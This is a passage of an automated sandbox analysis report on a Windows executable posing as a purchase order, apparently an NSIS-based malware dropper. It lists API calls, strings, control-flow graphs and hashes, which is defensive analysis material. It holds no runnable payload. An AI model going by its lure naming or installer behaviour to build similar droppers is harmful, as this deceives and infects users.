                                                • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 765 405ddf-405deb 766 405dec-405e20 GetTickCount GetTempFileNameW 765->766 767 405e22-405e24 766->767 768 405e2f-405e31 766->768 767->766 769 405e26 767->769 770 405e29-405e2c 768->770 769->770
                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00405DFD
                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO 0309494059506060609696007.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035D9), ref: 00405E18
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CountFileNameTempTick
                                                • String ID: "C:\Users\user\Desktop\PO 0309494059506060609696007.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                • API String ID: 1716503409-3886946505
                                                • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 771 6e421777-6e4217b6 call 6e421b5f 775 6e4218d6-6e4218d8 771->775 776 6e4217bc-6e4217c0 771->776 777 6e4217c2-6e4217c8 call 6e422352 776->777 778 6e4217c9-6e4217d6 call 6e422394 776->778 777->778 783 6e421806-6e42180d 778->783 784 6e4217d8-6e4217dd 778->784 785 6e42180f-6e42182b call 6e422569 call 6e4215b4 call 6e421272 GlobalFree 783->785 786 6e42182d-6e421831 783->786 787 6e4217f8-6e4217fb 784->787 788 6e4217df-6e4217e0 784->788 809 6e421885-6e421889 785->809 792 6e421833-6e42187c call 6e4215c6 call 6e422569 786->792 793 6e42187e-6e421884 call 6e422569 786->793 787->783 794 6e4217fd-6e4217fe call 6e422d37 787->794 790 6e4217e2-6e4217e3 788->790 791 6e4217e8-6e4217e9 call 6e422aac 788->791 798 6e4217f0-6e4217f6 call 6e422724 790->798 799 6e4217e5-6e4217e6 790->799 805 6e4217ee 791->805 792->809 793->809 802 6e421803 794->802 808 6e421805 798->808 799->783 799->791 802->808 805->802 808->783 814 6e4218c6-6e4218cd 809->814 815 6e42188b-6e421899 call 6e42252c 809->815 814->775 817 6e4218cf-6e4218d0 GlobalFree 814->817 821 6e4218b1-6e4218b8 815->821 822 6e42189b-6e42189e 815->822 817->775 821->814 824 6e4218ba-6e4218c5 call 6e42153d 821->824 822->821 823 6e4218a0-6e4218a8 822->823 823->821 825 6e4218aa-6e4218ab FreeLibrary 823->825 824->814 825->821
                                                APIs
                                                  • Part of subcall function 6E421B5F: GlobalFree.KERNEL32(?), ref: 6E421DB2
                                                  • Part of subcall function 6E421B5F: GlobalFree.KERNEL32(?), ref: 6E421DB7
                                                  • Part of subcall function 6E421B5F: GlobalFree.KERNEL32(?), ref: 6E421DBC
                                                • GlobalFree.KERNEL32(00000000), ref: 6E421825
                                                • FreeLibrary.KERNEL32(?), ref: 6E4218AB
                                                • GlobalFree.KERNEL32(00000000), ref: 6E4218D0
                                                  • Part of subcall function 6E422352: GlobalAlloc.KERNEL32(00000040,?), ref: 6E422383
                                                  • Part of subcall function 6E422724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,6E4217F6,00000000), ref: 6E4227F4
                                                  • Part of subcall function 6E4215C6: wsprintfW.USER32 ref: 6E4215F4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2313961688.000000006E421000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E420000, based on PE: true
                                                • Associated: 00000000.00000002.2313936159.000000006E420000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2313981846.000000006E424000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.2314004902.000000006E426000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6e420000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc$Librarywsprintf
                                                • String ID:
                                                • API String ID: 3962662361-3916222277
                                                • Opcode ID: e355ac7433723acd36a495dee2d8061be2a32891b98d9f8143f8e2ae3d6c4e43
                                                • Instruction ID: fbe15fc90b6c45de15e2e561e81e7873ecd309677dcaa00f99556fe44f091722
                                                • Opcode Fuzzy Hash: e355ac7433723acd36a495dee2d8061be2a32891b98d9f8143f8e2ae3d6c4e43
                                                • Instruction Fuzzy Hash: 2741AE71800245AEDF109FF499D4FD637ACBF05354F1448BBE9159E38ADBBA8189CBA0
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                APIs
                                                • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nst14AC.tmp,00000023,00000011,00000002), ref: 0040242F
                                                • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nst14AC.tmp,00000000,00000011,00000002), ref: 0040246F
                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst14AC.tmp,00000000,00000011,00000002), ref: 00402557
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CloseValuelstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nst14AC.tmp
                                                • API String ID: 2655323295-990186709
                                                • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                APIs
                                                • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: Close$Enum
                                                • String ID:
                                                • API String ID: 464197530-0
                                                • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                APIs
                                                  • Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C48
                                                  • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                  • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                  • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\sillinesses\Foiningly,?,00000000,000000F0), ref: 0040164D
                                                Strings
                                                • C:\Users\user\AppData\Local\sillinesses\Foiningly, xrefs: 00401640
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                • String ID: C:\Users\user\AppData\Local\sillinesses\Foiningly
                                                • API String ID: 1892508949-3300392592
                                                • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                                • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                                • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                                APIs
                                                  • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00000400,00403460,Undseeligheds17 Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                  • Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405C48
                                                  • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                  • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                • lstrlenW.KERNEL32(C:\,00000000,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420,00000000), ref: 00405CF0
                                                • GetFileAttributesW.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,74DF3420,004059EC,?,C:\Users\user\AppData\Local\Temp\,74DF3420), ref: 00405D00
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                • String ID: C:\
                                                • API String ID: 3248276644-3404278061
                                                • Opcode ID: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
                                                • Instruction ID: afdd3353ca4dad18281e5c0e52e07b41dda899da8cc80c7b0a0d0babdec36168
                                                • Opcode Fuzzy Hash: 9cc0d29f879c40394f09ec61343d80eeaf68cc1a92588db26b65915d11595f82
                                                • Instruction Fuzzy Hash: 87F0443100DF2225F622333A0C05AAF2554DE82328BAA053FFC52B12D2DA3C88138D7E
                                                APIs
                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,?,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                                • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll), ref: 004061D9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                                • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                                • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                                APIs
                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                                • CloseHandle.KERNEL32(?), ref: 004058D9
                                                Strings
                                                • Error launching installer, xrefs: 004058B6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: CloseCreateHandleProcess
                                                • String ID: Error launching installer
                                                • API String ID: 3712363035-66219284
                                                • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                                • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                                • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 0040205D
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                  • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                  • Part of subcall function 00405322: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,0040327A,0040327A,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,00000000,0041C000,74DF23A0), ref: 0040537D
                                                  • Part of subcall function 00405322: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst14AC.tmp\System.dll), ref: 0040538F
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                  • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040206E
                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004020EB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2278037558.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2278024017.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278051722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278065919.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2278263878.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_PO 0309494059506060609696007.jbxd
                                                Similarity
                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                • String ID:
